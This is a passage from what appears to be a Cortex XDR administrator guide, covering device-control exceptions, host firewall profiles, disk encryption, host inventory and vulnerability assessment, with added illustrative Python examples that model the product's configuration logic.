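HOUR = timedelta(hours=1)
MAX_TEMPORARY = timedelta(days=30)   # upper bound for a temporary exception


@dataclass(frozen=True)
class Violation:
    """A Device Control violation as logged on the Violations page (constructed model)."""
    endpoint_id: str
    device_type: str      # device category, e.g. "Disk Drive"
    vendor: str
    product: str
    serial: str
    timestamp: datetime


@dataclass(frozen=True)
class DeviceException:
    kind: str                               # "permanent", "temporary" or "profile"
    device_type: str
    vendor: str
    permission: str                         # permission label, e.g. "Read" (assumed values)
    product: Optional[str] = None           # None = any product of this vendor
    serial: Optional[str] = None            # None = any unit
    endpoint_id: Optional[str] = None       # temporary only: None = all endpoints
    expires_at: Optional[datetime] = None   # temporary only
    profile: Optional[str] = None           # profile only: owning Device Exceptions profile


def temporary_from_violation(v: Violation, permission: str, hours: int,
                             this_endpoint_only: bool, include_product: bool = True,
                             include_serial: bool = True) -> DeviceException:
    """Build the temporary exception the Violations page offers: scope, identifiers, time frame."""
    ttl = hours * HOUR
    if not timedelta(0) < ttl <= MAX_TEMPORARY:
        raise ValueError("time frame must be between one hour and 30 days")
    return DeviceException(
        kind="temporary", device_type=v.device_type, vendor=v.vendor, permission=permission,
        product=v.product if include_product else None,
        serial=v.serial if include_serial else None,
        endpoint_id=v.endpoint_id if this_endpoint_only else None,
        expires_at=v.timestamp + ttl)


def exception_applies(exc: DeviceException, v: Violation, now: datetime,
                      endpoint_profiles: Dict[str, Iterable[str]]) -> bool:
    """True if `exc` approves the device in violation `v` at time `now`."""
    # Category and vendor are mandatory selectors; product and serial narrow the match.
    if (exc.device_type, exc.vendor) != (v.device_type, v.vendor):
        return False
    if exc.product is not None and exc.product != v.product:
        return False
    if exc.serial is not None and exc.serial != v.serial:
        return False
    if exc.kind == "permanent":
        return True                      # applies on all endpoints and platforms
    if exc.kind == "temporary":
        if exc.endpoint_id is not None and exc.endpoint_id != v.endpoint_id:
            return False
        return exc.expires_at is not None and now < exc.expires_at   # expired = blocked again
    if exc.kind == "profile":
        # Counts only where the owning Device Exceptions profile is assigned to the endpoint.
        return exc.profile in set(endpoint_profiles.get(v.endpoint_id, ()))
    raise ValueError(f"unknown exception kind {exc.kind!r}")


def granted_permission(v: Violation, exceptions: Sequence[DeviceException], now: datetime,
                       endpoint_profiles: Dict[str, Iterable[str]]) -> Optional[str]:
    """Permission from the first applicable exception, or None if the device stays blocked."""
    for exc in exceptions:
        if exception_applies(exc, v, now, endpoint_profiles):
            return exc.permission
    return None


# Constructed sample data: one blocked removable drive and three candidate exceptions.
T0 = datetime(2020, 11, 2, 9, 0)
SAMPLE_VIOLATION = Violation("EP-001", "Disk Drive", "Vendor-A", "Stick-16G", "SN-0001", T0)
SAMPLE_EXCEPTIONS = [
    DeviceException("permanent", "Disk Drive", "Vendor-B", "Read"),              # other vendor
    temporary_from_violation(SAMPLE_VIOLATION, "Read", hours=48, this_endpoint_only=True),
    DeviceException("profile", "Disk Drive", "Vendor-A", "Read/Write", profile="Lab-USB"),
]
ENDPOINT_PROFILES = {"EP-002": ["Lab-USB"]}   # which endpoints carry the Lab-USB profile

if __name__ == "__main__":
    print(granted_permission(SAMPLE_VIOLATION, SAMPLE_EXCEPTIONS, T0 + HOUR, ENDPOINT_PROFILES))
```

Run as a script it reports the permission the 48-hour temporary exception grants on EP-001; the same device on EP-002 is allowed only through the profile exception, and once the temporary exception expires the device on EP-001 is blocked again.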

Add a Custom Device Class


(Windows only) You can include custom USB-connected device classes beyond Disk Drive, CD-ROM,
Windows Portable Devices and Floppy Disk Drives, such as USB-connected network adapters. When
you create a custom device class, you must supply Cortex XDR with the official ClassGuid identifier used
by Microsoft. Alternatively, if you configured a GUID value for a specific USB-connected device, you must
use this value for the new device class. After you add a custom device class, you can view it in Device
Management and enforce any device control rules and exceptions on this device class.
To create a custom USB-connected device class:

STEP 1 | Go to Endpoints > Policy Management > Settings > Device Management.
This is the list of all your custom USB-connected devices.

STEP 2 | Create the new device class.


Select +New Device. Set a Name for the new device class and supply a valid and unique GUID Identifier.
For each GUID value you can define one class type only.

STEP 3 | Save.
The new device class is now available in Cortex XDR as all other device classes.

Host Firewall
The Cortex XDR host firewall enables you to control communications on your endpoints. To use the host
firewall, you set rules that allow or block the traffic on the devices and apply them to your endpoints using
Cortex XDR host firewall policy rules. Additionally, you can configure different sets of rules based on the
current location of your endpoints, within or outside your organization network. The Cortex XDR host
firewall rules leverage the operating system firewall APIs and are enforced on your endpoints only; they do
not update your Windows or Mac firewall settings.
The following are prerequisites to apply Cortex XDR host firewall policy rules on your endpoints:

Platform    Requirements and Limitations

Windows
    • Cortex XDR agent 7.1 or a later release.
    • Cortex XDR host firewall rules can apply to both incoming and outgoing communication on the endpoint.

Mac
    • Cortex XDR agent 7.2 or a later release.
    • Cortex XDR Host Firewall is not supported on endpoints running macOS 11.0 and later releases.
    • Cortex XDR host firewall rules can apply only to incoming communication on the endpoint.
    • After you disable or remove the Cortex XDR host-firewall policy on the endpoint, the system firewall on the endpoint is disabled.
    • You cannot configure the following Mac host firewall settings with the Cortex XDR host firewall:
        • Automatically allow built-in software to receive incoming connections.
        • Automatically allow downloaded signed software to receive incoming connections.

Linux
    Not supported.

To configure the Cortex XDR host firewall in your network, follow this high-level workflow:
• Enable Network Location Configuration
• Add a New Host Firewall Profile
• Apply Host Firewall Profiles to Your Endpoints
• Monitor the Host Firewall Activity on your Endpoint

Enable Network Location Configuration


If you want to apply location-based host firewall rules, you must first enable network location configuration
in your Agent Settings Profile.
When enabled, Cortex XDR performs the following tests to determine the endpoint location:
1. A domain controller (DC) connectivity test to check whether the device is connected to the internal
network. If the device has access to LDAP://rootDSE, then it is in the organization. Otherwise, if the DC
test failed or returned an external domain, Cortex XDR proceeds to a DNS connectivity test.
2. In the DNS test, the Cortex XDR agent submits a DNS name that is known only to the internal network.
If the DNS returned the pre-configured internal IP, then the device is within the organization. Otherwise,
if the DNS name cannot be resolved, then the device is located outside.
At every heartbeat, and whenever the Cortex XDR agent detects a network change on the endpoint, the agent
triggers the device location test and recalculates the policy according to the new location.
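The two-step location test described above, as an added Python example (not Cortex XDR agent code). The DC and DNS probes are passed in as callables so the decision logic runs offline; `determine_location`, `resolve_with_system_dns`, the domain names and the IP address are assumptions, and the LDAP://rootDSE read is represented by a probe that returns the domain that answered.

```python
import socket
from typing import Callable, Optional

INTERNAL = "internal"
EXTERNAL = "external"


def determine_location(dc_probe: Callable[[], Optional[str]],
                       dns_resolve: Callable[[str], Optional[str]],
                       organization_domain: str,
                       internal_dns_name: str,
                       expected_internal_ip: str) -> str:
    """Classify the endpoint as inside or outside the organization network.

    Step 1, DC connectivity test: `dc_probe()` stands for reading LDAP://rootDSE and
    returns the domain that answered, or None when no DC is reachable. An answer from
    the organization's own domain means the endpoint is inside.
    Step 2, DNS test (only when step 1 fails or answers an external domain): resolve a
    name that exists only on the internal DNS; only the pre-configured internal IP
    counts as inside. Any other answer, or no answer, means outside.
    """
    try:
        domain = dc_probe()
    except OSError:
        domain = None
    if domain is not None and domain.lower() == organization_domain.lower():
        return INTERNAL
    try:
        resolved = dns_resolve(internal_dns_name)
    except OSError:          # socket.gaierror is an OSError: unresolvable name
        resolved = None
    return INTERNAL if resolved == expected_internal_ip else EXTERNAL


def resolve_with_system_dns(name: str) -> Optional[str]:
    """Real resolver for the DNS test, using the endpoint's configured DNS servers."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


# Constructed probes standing in for an agent on a laptop that has left the office:
# no DC answers, and the public resolver does not know the internal-only name.
def no_dc_reachable() -> Optional[str]:
    return None


def public_resolver(name: str) -> Optional[str]:
    return None


if __name__ == "__main__":
    print(determine_location(no_dc_reachable, public_resolver,
                             "corp.example", "location-check.corp.example", "10.10.0.5"))
    # prints "external"
```

The second step matters for the failure mode where a DC is unreachable but the endpoint is still on the internal network (for example a site link is down): the internal-only name still resolves to the configured IP, so the endpoint keeps the internal rule set. Conversely, a public resolver that answers with some other address for a look-alike name does not pass the test, because only the pre-configured IP counts.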

Add a New Host Firewall Profile


STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy Management > Extensions Profiles and select + New Profile. Select the
Platform and click Host Firewall > Next.

STEP 2 | Fill-in the general information for the new profile.
• Assign a name and an optional description to the profile.
• By default, host firewall profile rules are based on the current location of your device. Configure
two sets of rules: a set of External Rules that apply when the device is located outside the internal
organization network, and a set of Internal Rules that apply when the device is located within the
internal organization network. If you disable the Location Based option, your policy will apply the
internal set of rules only, and that will be applied to the device regardless of its location.

STEP 3 | Create host firewall rules.


For Windows:
Click +New Rule. A host firewall rule allows or blocks the communication to and/or from a Windows
endpoint. You can fine-tune the rule by applying the action to the following parameters:

• Action—Select whether to Allow or Block the communication on the endpoint.


• Specific IPs and Ports—(Optional) Configure the rule for specific local or remote IPs and/or Ports.
You can also set a range of IP addresses.
• Direction—Select the direction of the communication this rule applies to:
• Inbound—Communication to the endpoint.
• Outbound—Communication from the endpoint.
• Both—The rule applies to both inbound and outbound communication.
• Protocol—(Optional) Select a specific protocol you want this rule to apply to.

• Path—(Optional) Enter the full path and name of a program you want the rule to apply to. If you use
system variables in the path definition, you must re-enforce the policy on the endpoint every time the
directories and/or system variables on the endpoint change.
If the profile is location based, you can define both internal and external rules. You can also copy a rule
from one set to another.
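Matching a connection against the Windows rule parameters listed above, with the internal and external rule sets of a location-based profile, as an added Python example (not Cortex XDR code). First-match ordering within a rule set, the allow default when no rule matches, the "first-last" range syntax, the field names and the sample profile are assumptions; the rule parameters themselves are the ones the guide lists.

```python
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass(frozen=True)
class Rule:
    """One host firewall rule; None in an optional field means 'any'."""
    action: str                        # "allow" or "block"
    direction: str = "both"            # "inbound", "outbound" or "both"
    protocol: Optional[str] = None     # e.g. "tcp", "udp"
    local_ip: Optional[str] = None     # single IP, CIDR, or "first-last" range
    remote_ip: Optional[str] = None
    local_port: Optional[int] = None
    remote_port: Optional[int] = None
    path: Optional[str] = None         # full program path, compared literally


@dataclass(frozen=True)
class Connection:
    """A connection attempt seen on the endpoint (constructed model)."""
    direction: str
    protocol: str
    local_ip: str
    remote_ip: str
    local_port: int
    remote_port: int
    path: str


def ip_selected(selector: Optional[str], ip: str) -> bool:
    """True if `ip` falls inside the rule's IP selector."""
    if selector is None:
        return True
    addr = ip_address(ip)
    if "-" in selector:                                   # "10.0.0.1-10.0.0.50"
        first, last = (ip_address(p.strip()) for p in selector.split("-", 1))
        return first <= addr <= last
    return addr in ip_network(selector, strict=False)     # single IP or CIDR


def rule_matches(rule: Rule, conn: Connection) -> bool:
    if rule.direction != "both" and rule.direction != conn.direction:
        return False
    if rule.protocol is not None and rule.protocol.lower() != conn.protocol.lower():
        return False
    if not ip_selected(rule.local_ip, conn.local_ip) or not ip_selected(rule.remote_ip, conn.remote_ip):
        return False
    if rule.local_port is not None and rule.local_port != conn.local_port:
        return False
    if rule.remote_port is not None and rule.remote_port != conn.remote_port:
        return False
    # Paths compare literally; a rule written with a system variable matches only the value
    # the variable had when the policy was enforced, which is why the guide asks for
    # re-enforcement when directories or variables change.
    if rule.path is not None and rule.path.lower() != conn.path.lower():
        return False
    return True


@dataclass
class HostFirewallProfile:
    location_based: bool
    internal_rules: List[Rule] = field(default_factory=list)
    external_rules: List[Rule] = field(default_factory=list)

    def active_rules(self, location: str) -> List[Rule]:
        """Internal rules inside the organization, and always when not location based."""
        if not self.location_based or location == "internal":
            return self.internal_rules
        return self.external_rules


def decide(profile: HostFirewallProfile, location: str, conn: Connection,
           default: str = "allow") -> str:
    """Action of the first matching rule in the active set; `default` if none matches."""
    for rule in profile.active_rules(location):
        if rule_matches(rule, conn):
            return rule.action
    return default


# Constructed profile: remote administration reachable only from the internal address range,
# and no inbound connections at all while the endpoint is outside the organization.
SAMPLE_PROFILE = HostFirewallProfile(
    location_based=True,
    internal_rules=[Rule("allow", "inbound", "tcp", remote_ip="10.0.0.0/8", local_port=3389),
                    Rule("block", "inbound", "tcp", local_port=3389)],
    external_rules=[Rule("block", "inbound")],
)
```

Because the external set is selected purely by the location test, a profile that blocks all inbound traffic outside the office still lets the endpoint initiate outbound connections, and disabling the Location Based option makes the internal set apply everywhere.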
For Mac:

1. Enable Host Firewall Management.


Enable this option to allow Cortex XDR to manage the host firewall on your Mac endpoints.
2. Configure the host firewall internal and external settings.
The host firewall settings allow or block inbound communication on your Mac endpoints. You can
fine-tune the rule by applying the action to the following parameters:
• Enable stealth mode—Hide your Mac endpoint from all TCP and UDP networks by enabling the
Apple Stealth mode on your endpoint.
• Block all incoming connections—Select whether to block all incoming communications on the
endpoint or not.
• Application exclusions—Allow or block specific programs running on the endpoint using their Apple
BundleID.
If the profile is location based, you can define both internal and external settings.

STEP 4 | Save your profile.
When you’re done, Create your host firewall profile.

STEP 5 | Apply Host Firewall Profiles to Your Endpoints.

Apply Host Firewall Profiles to Your Endpoints


After you define the required host firewall profiles, you must configure the Protection Policies and enforce
them on your endpoints. Cortex XDR applies Protection policies on endpoints from top to bottom, as you’ve
ordered them on the page. The first policy that matches the endpoint is applied. If no policies match, the
default policy that enables all communication to and from the endpoint is applied.

STEP 1 | Log in to Cortex XDR.


Go to Endpoints > Policy Management > Extensions Policy Rules > +New Policy.

STEP 2 | Configure settings for the host firewall policy.


1. Assign a policy name and optional description.
The platform will automatically be assigned to Windows.
2. Assign the host firewall profile you want to use in this rule.
3. If desired, assign Device Configuration and/or Device Exceptions and/or Host Firewall profiles. If
none are assigned, the default profiles will be applied.
4. Click Next.
5. Select the target endpoints on which to enforce the policy.
Use filters or manual endpoint selection to define the exact target endpoints of the policy rules.
6. Click Done.
Alternatively, you can associate the host firewall profile with an existing policy. Right-click the policy and
select Edit. Select the Host Firewall profile and click Next. If needed, you can edit other settings in the
rule (such as target endpoints, description, etc.). When you’re done, click Done.

STEP 3 | Configure policy hierarchy.


Drag and drop the policies in the desired order of execution.

STEP 4 | Save the policy hierarchy.


After the policy is saved and applied to the agents, Cortex XDR enforces the host firewall policies on
your environment.

Monitor the Host Firewall Activity on your Endpoint


To view only the communication events on the endpoint to which the Cortex XDR host firewall rules were
applied, you can run the Cytool firewall show command.
Additionally, to monitor the communication on your endpoint, you can use the following operating system
utilities:
• Windows—Since the Cortex XDR Host Firewall leverages the Microsoft Windows Filtering Platform
(WFP), you can use a monitoring tool such as Network Shell (netsh), the Microsoft Windows command-
line utility to monitor the network communication on the endpoint.
• Mac—From the endpoint System Preferences > Security and Privacy > Firewall > Firewall options, you
can view the list of blocked and allowed applications in the firewall. The Cortex XDR host firewall blocks
only incoming communications on Mac endpoints, still allowing outbound communication initiated from
the endpoint.

Disk Encryption
Cortex XDR provides full visibility into Windows and Mac endpoints that were encrypted using BitLocker
and FileVault, respectively. Additionally, you can apply Cortex XDR Disk Encryption rules on the endpoints
by creating disk encryption rules and policies that leverage BitLocker and FileVault capabilities.
Before you start applying disk encryption policy rules, ensure you meet the following requirements and
review these known limitations:

Requirement / Limitation    Windows    Mac

Endpoint Pre-requisites
    Windows:
    • The endpoint is running a Microsoft Windows version that supports BitLocker.
    • The endpoint is within the organization network domain.
    • The endpoint is running a Cortex XDR agent 7.1 or later release.
    • To allow the agent to encrypt the endpoint, Trusted Platform Module (TPM) must be supported and enabled on the endpoint.
    • To allow the agent to access the encryption recovery key backup, Active Directory Domain Services must be enabled on the endpoint.
    Mac:
    • The endpoint is running a macOS version that supports FileVault.
    • The endpoint is running a Cortex XDR agent 7.2 or later release.

Disk Encryption Scope
    Windows:
    • You can enforce XDR disk encryption policy rules only on the Operating System volume.
    Mac:
    • You can enforce XDR disk encryption policy rules only on the Operating System volume.
    • The Cortex XDR Disk Encryption profile for Mac can encrypt the endpoint disk; however, it cannot decrypt it. After you disable the Cortex XDR policy rule on the endpoint, you can decrypt the endpoint manually.

Other
    Windows (Group Policy configuration):
    • Make sure the GPO configuration applying to the endpoint enables Save BitLocker recovery information to AD DS for operating system drives.
    • Make sure your Cortex XDR disk encryption policy does not conflict with the GPO configuration to Choose drive encryption method and cipher strength.
    Mac:
    • Provide a FileVaultMaster certificate / institutional recovery key (IRK) that is signed by a valid authority.
    • It can take the agent up to 5 minutes to report the disk encryption status to Cortex XDR if the endpoint was encrypted through Cortex XDR, and up to one hour if it was encrypted through another MDM.
    • In line with the operating system requirements, the Cortex XDR encryption profile will take effect on the endpoint after the user logs off and back on, and approves the prompt to enable the endpoint encryption.
    • Palo Alto Networks recommends you do not apply an encryption enforcement from another MDM on the endpoint together with the Cortex XDR encryption profile.

Follow this high-level workflow to deploy the Cortex XDR disk encryption in your network:
• Monitor the Endpoint Encryption Status in Cortex XDR
• Configure a Disk Encryption Profile
• Apply Disk Encryption Profile to Your Endpoints

Monitor the Endpoint Encryption Status in Cortex XDR


You can monitor the Encryption Status of an endpoint in the new Endpoints > Disk Encryption Visibility
table. For each endpoint, the table lists both system and custom drives that were encrypted.

The following table describes both the default and additional optional fields that you can view in the Disk
Encryption Visibility table per endpoint. The fields are in alphabetical order.

Field    Description

Encryption Status
    The endpoint encryption status can be:
    • Applying Policy—Indicates that the Cortex XDR disk encryption policy is in the process of being applied on the endpoint.
    • Compliant—Indicates that the Cortex XDR agent encryption status on the endpoint is compliant with the Cortex XDR disk encryption policy.
    • Not Compliant—Indicates that the Cortex XDR agent encryption status on the endpoint is not compliant with the Cortex XDR disk encryption policy.
    • Not Configured—Indicates that no disk encryption rules are configured on the endpoint.
    • Not Supported—Indicates that the operating system running on the endpoint is not supported by Cortex XDR.
    • Unmanaged—Indicates that the endpoint encryption is not managed by Cortex XDR.

Endpoint ID
    Unique ID assigned by Cortex XDR that identifies the endpoint.

Endpoint Name
    Hostname of the endpoint.

Endpoint Status
    The status of the endpoint. For more details, see View Details About an Endpoint.

IP Address
    Last known IPv4 or IPv6 address of the endpoint.

Last Reported
    Date and time of the last change in the agent’s status. For more details, see View Details About an Endpoint.

MAC Address
    The MAC address of the endpoint.

Operating System
    The platform running on the endpoint.

OS Version
    Name of the operating system version running on the endpoint.

Volume Status
    Lists all the disks on the endpoint along with the status per volume, Decrypted or Encrypted. For Windows endpoints, Cortex XDR includes the encryption method.

You can also monitor the endpoint Encryption Status in your Endpoint Administration table. If the
Encryption Status is missing from the table, add it.

Configure a Disk Encryption Profile


STEP 1 | Log in to Cortex XDR.
Go to Endpoints > Policy Management > Extensions Profiles and select + New Profile. Choose the
Platform and select Disk Encryption. Click Next.

STEP 2 | Fill-in the general information for the new profile.


Assign a name and an optional description to the profile.

STEP 3 | Enable disk encryption.

To enable the Cortex XDR agent to apply disk encryption rules using the operating system disk
encryption capabilities, Enable the Use disk encryption option.

STEP 4 | Configure Encryption details.


• For Windows:
• Encrypt or decrypt the system drives.
• Encrypt the entire disk or only the used disk space.
• For Mac:
In line with the operating system requirements, when the Cortex XDR agent attempts to enforce an
encryption profile on an endpoint, the endpoint user is required to enter the login password. Limit the
number of login attempts to one or three. Otherwise, if you do not force login attempts, the user can
continuously dismiss the operating system pop-up and the Cortex XDR agent will never encrypt the
endpoint.

STEP 5 | (Windows only) Specify the Encryption methods per operating system.
For each operating system (Windows 7, Windows 8-10, Windows 10 (1511) and above), select the
encryption method from the corresponding list.

You must select the same encryption method configured by the Microsoft Windows Group
Policy in your organization for the target endpoints. Otherwise, if you select a different
encryption method than the one already applied through the Windows Group Policy,
Cortex XDR will display errors.

STEP 6 | (Mac only) Upload the FileVaultMaster certificate.


To enable the Cortex XDR agent to encrypt your endpoint, or to help users who forgot their password
to decrypt the endpoint, you must upload to Cortex XDR the FileVaultMaster certificate / institutional
recovery key (IRK). You must ensure the key is signed by a valid authority and upload a CER file only.

STEP 7 | Save your profile.


When you’re done, Create your disk encryption profile.

STEP 8 | Apply Disk Encryption Profile to Your Endpoints.

Apply Disk Encryption Profile to Your Endpoints


After you define the required disk encryption profiles, you must configure the Protection Policies and
enforce them on your endpoints. Cortex XDR applies Protection policies on endpoints from top to bottom,
as you’ve ordered them on the page. The first policy that matches the endpoint is applied. If no policies
match, the default policy that enables all communication to and from the endpoint is applied.

STEP 1 | Log in to Cortex XDR.


Go to Endpoints > Policy Management > Extensions Policy Rules > +New policy.

STEP 2 | Configure settings for the disk encryption policy.


1. Assign a policy name and optional description.
The platform will automatically be assigned to Windows.
2. Assign the disk encryption profile you want to use in this rule.
3. If desired, assign Device Configuration and/or Device Exceptions profiles and/or Host Firewall
profiles. If none are assigned, the default profiles will be applied.

4. Click Next.
5. Select the target endpoints on which to enforce the policy.
Use filters or manual endpoint selection to define the exact target endpoints of the policy rules.
6. Click Done.
Alternatively, you can associate the disk encryption profile with an existing policy. Right-click the policy
and select Edit. Select the Disk Encryption profile and click Next. If needed, you can edit other settings
in the rule (such as target endpoints, description, etc.). When you’re done, click Done.

STEP 3 | Configure policy hierarchy.


Drag and drop the policies in the desired order of execution.

STEP 4 | Save the policy hierarchy.


After the policy is saved and applied to the agents, Cortex XDR enforces the disk encryption policies on
your environment.

STEP 5 | Now, Monitor the Endpoint Encryption Status in Cortex XDR.

Host Inventory
With Host inventory, you gain full visibility into the business and IT operational data on all your
endpoints. By reviewing the inventory for all your hosts in a single place, you can quickly identify IT
and security issues that exist in your network, such as a suspicious service or autorun that was added
to an endpoint. The Cortex XDR agent scans the endpoint every 24 hours for any updates. Alternatively,
you can rescan the endpoint to retrieve the most up-to-date data. It can take Cortex XDR up to 6 hours
to collect initial data from all endpoints in your network.
The following are prerequisites to enable Host inventory for your Cortex XDR instance:

Requirement    Description

Licenses and Add-ons
    • Cortex XDR Pro per Endpoint license.
    • Host Insights Add-on.

Supported Platforms
    • Windows—Cortex XDR agent 7.1 or a later release.
    • Mac—Not supported.
    • Linux—Cortex XDR agent 7.1 or a later release.

Setup and Permissions
    • Ensure Host Inventory Data Collection is enabled for your Cortex XDR agent.

The Cortex XDR Host inventory includes the following entities and information, according to the operating
system running on the endpoint:

Entity Windows Mac Linux

Accessibility — —

Applications


Autoruns

Daemons —

Disks

Drivers —

Extensions — —

Groups

Mounts —

Services — —

Shares

System Information

Users

Users to Groups

For each entity, Cortex XDR lists all the details about the entity, and the details about the endpoint it
applies to. For example, the default Services view lists a separate row for every service on every endpoint:

Alternatively, to better understand the overall presence of each entity across the total number of endpoints,
you can switch to the aggregated view and group the data by the main entity. You can also sort and
filter according to the number of affected endpoints. For example, in the Services aggregated view, you can
sort by the number of affected endpoints to identify the least commonly deployed service in your network.
To get a closer view of all affected endpoints, right-click and select View affected endpoints:
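Building the aggregated view from a per-endpoint export, as an added Python example (not Cortex XDR code): it reads a constructed TSV of the Services view, counts affected endpoints per service and sorts so the least commonly deployed service comes first, which is the check the paragraph above describes. The column names, the sample endpoints and the sample services are assumptions.

```python
import csv
import io
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Constructed sample export of the per-endpoint Services view (one row per service per endpoint).
SAMPLE_ROWS = [
    ("Endpoint Name", "Service Name", "Path", "State"),
    ("ws-01", "Spooler", r"C:\Windows\System32\spoolsv.exe", "Running"),
    ("ws-01", "WinRM", r"C:\Windows\System32\svchost.exe", "Stopped"),
    ("ws-01", "UpdaterSvc", r"C:\Users\Public\updater.exe", "Running"),
    ("ws-02", "Spooler", r"C:\Windows\System32\spoolsv.exe", "Running"),
    ("ws-02", "WinRM", r"C:\Windows\System32\svchost.exe", "Running"),
    ("ws-03", "Spooler", r"C:\Windows\System32\spoolsv.exe", "Running"),
]
SAMPLE_TSV = "\n".join("\t".join(row) for row in SAMPLE_ROWS) + "\n"


def parse_export(tsv_text: str) -> List[Dict[str, str]]:
    """Read a TSV export into one dict per row, keyed by the header line."""
    return list(csv.DictReader(io.StringIO(tsv_text), delimiter="\t"))


def aggregate(rows: Iterable[Dict[str, str]], entity_col: str = "Service Name",
              endpoint_col: str = "Endpoint Name") -> List[Tuple[str, int, List[str]]]:
    """Aggregated view: one row per entity with the number of affected endpoints,
    sorted ascending so the least commonly deployed entity comes first."""
    endpoints = defaultdict(set)     # distinct endpoints, in case an export repeats rows
    for row in rows:
        endpoints[row[entity_col]].add(row[endpoint_col])
    return sorted(((name, len(eps), sorted(eps)) for name, eps in endpoints.items()),
                  key=lambda t: (t[1], t[0]))


def rare_entities(rows: Iterable[Dict[str, str]], max_endpoints: int = 1,
                  **cols) -> List[Tuple[str, int]]:
    """Entities present on at most `max_endpoints` endpoints: the ones worth a closer look."""
    return [(name, n) for name, n, _ in aggregate(rows, **cols) if n <= max_endpoints]


def affected_endpoints(rows: Iterable[Dict[str, str]], entity: str, **cols) -> List[str]:
    """The 'View affected endpoints' drill-down for one entity."""
    for name, _, eps in aggregate(rows, **cols):
        if name == entity:
            return eps
    return []


if __name__ == "__main__":
    rows = parse_export(SAMPLE_TSV)
    for name, count, eps in aggregate(rows):
        print(f"{name:<12} {count:>3} endpoint(s): {', '.join(eps)}")
```

The same functions work on any of the exported entity tables by passing the entity column name (for example `entity_col="Driver Name"`), since every view shares the one-row-per-entity-per-endpoint layout described above.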

View host inventory


To view the Host inventory, go to Add-ons > Host Insights > Host Inventory. You can export the tables and
respective asset views to a tab-separated values (TSV) file.

Data    Description

Accessibility
    Details about installed applications that require and were allowed special permissions to enable a camera, microphone, accessibility features, full disk access, or screen captures.

Applications
    Details about all applications installed on your endpoints.
    For each application, Cortex XDR lists the existing CVEs and the vulnerability severity score that reflects the highest NIST vulnerability score detected for the application.
    To further examine these vulnerabilities, see Application Analysis.

Autoruns
    Details about executables that start automatically when the user logs in or boots the endpoint.
    Cortex XDR displays information about autoruns that are configured in the endpoint Registry, startup folders, scheduled tasks, services, drivers, daemons, extensions, Crond tasks, login items, login and logout hooks.
    For each autorun, Cortex XDR lists the autorun type and configuration, such as startup method, CMD, user details, and image path.

Daemons
    Details about all daemons that exist on the endpoint.
    For each daemon, Cortex XDR lists the following details:
    • Information about the daemon, such as the name, type, and path.
    • Daemon state, indicating whether it is loaded, running, or not running.

Disks
    Details about the disk volumes that exist on an endpoint.
    For each disk that exists on an endpoint, Cortex XDR lists details such as the drive type, name, file system, free space, and total size.

Drivers
    Details about all the drivers installed on an endpoint.
    For each driver, Cortex XDR lists all the following details:
    • Information about the driver, such as the driver name, type, and path.
    • Details about the driver runtime configuration:
        • The driver type
        • Whether the driver is currently running, in which mode, and the runtime state

Extensions
    Details about the system and kernel extensions currently running on your Mac endpoints.
    For each extension, Cortex XDR lists the following details:
    • Extension type, name, path, and version.
    • Extension state, indicating whether it is running, requires enabling, or is unloaded.

Groups
    Details about all user groups defined on an endpoint.
    For each group, Cortex XDR lists identifying details, such as name, SID/GID name and type.

Mounts
    Details about all the drives, volumes, and disks that were mounted on endpoints.
    For each mount, Cortex XDR lists the mount point directory, file system type, mount spec and GUID.

Services
    Details about all the services running on an endpoint.
    For each service, Cortex XDR lists all the following details:
    • Information about the service, such as the service name, type, and path.
    • Details about the service runtime configuration and status:
        • Whether the service is currently running and what the runtime state is
        • Whether you can stop, pause, or delay the service start time
        • Whether the service requires interaction with the endpoint desktop
        • The name of the user who started the service and the start mode

Shares
    Details about network shared folders defined on an endpoint.
    For each folder, Cortex XDR lists all the following details:
    • Shared network folder type: Disk Drive, Print Queue, Device, IPC, Disk Drive Admin, Print Queue Admin, Device Admin, IPC Admin.
    • Identifying details such as folder name, description, and path.
    • Whether the folder is limited to a maximum number of shares, and the maximum number of allowed shares.

System Information
    General system information about an endpoint.
    For each endpoint, Cortex XDR lists all the following details:
    • Information about the endpoint hardware, such as manufacturer, model, physical memory, processor architecture, and CPU.
    • The operating system name and release running on the endpoint.

Users
    List of users whose credentials are stored on the endpoint.
    For each user, Cortex XDR lists all the following details:
    • Identifying details about the user, such as name and SID/UID.
    • Details about the account, such as whether the account is active and the account type.
    • Information about the password set for this user account, such as whether it is required to log in, has an expiration date, or can be changed.

Users to Groups
    A list mapping all the users, local and in your domain, to the existing user groups on an endpoint.

    • Cortex XDR includes only the first 10,000 results per endpoint.
    • Cortex XDR lists only users that belong to each group directly, and does not include users who belong to a group within the main group.
    • If a local users group includes a domain user (whose credentials are stored on the Domain Controller server and not on the endpoint), Cortex XDR will include this user in the user-to-group mapping, but will not include it in the users insights view.

Vulnerability Assessment
Cortex XDR vulnerability assessment enables you to identify and quantify the security vulnerabilities on
an endpoint in Cortex XDR. Relying on the information from Cortex XDR, you can easily mitigate and
patch these vulnerabilities on all endpoints in your organization. To provide you with a comprehensive
understanding of the vulnerability severity, Cortex XDR retrieves the latest data for each CVE from the
NIST National Vulnerability Database, including CVE severity and metrics. You can use Cortex XDR to
evaluate the extent and severity of each CVE in your network, gain full visibility into the risks to which each
endpoint is exposed, and assess the vulnerability status of an installed application in your network.
Collecting the initial data from all endpoints in your network can take up to 6 hours. After that, Cortex
XDR initiates periodic recalculations to rescan the endpoints and retrieve the updated data. If at any point
you want to force data recalculation, click Recalculate Now.

The following are prerequisites for Cortex XDR to perform vulnerability assessment of your endpoints:

Requirement    Description

Licenses and Add-ons
    • Cortex XDR Pro per Endpoint license.
    • Host Insights Add-on.

Supported Platforms
    • Windows—
        • Cortex XDR agent 7.1 or a later release.
        • Cortex XDR lists only CVEs relating to the operating system, and not CVEs relating to applications provided by other vendors.
        • Cortex XDR retrieves the latest data for each CVE from the NIST National Vulnerability Database as well as from the Microsoft Security Response Center (MSRC).
        • For endpoints running Windows Insider, Cortex XDR cannot guarantee an accurate CVE assessment.
        • Cortex XDR does not display open CVEs for endpoints running Windows releases for which Microsoft no longer fixes CVEs.
    • Linux—Cortex XDR agent 7.1 or a later release.
    • Mac—Not supported.

Setup and Permissions
    • Ensure Host Inventory Data Collection is enabled for your Cortex XDR agent.

Limitations
    Cortex XDR calculates CVEs for applications according to the application version, and not according to application build numbers.

CVE Analysis
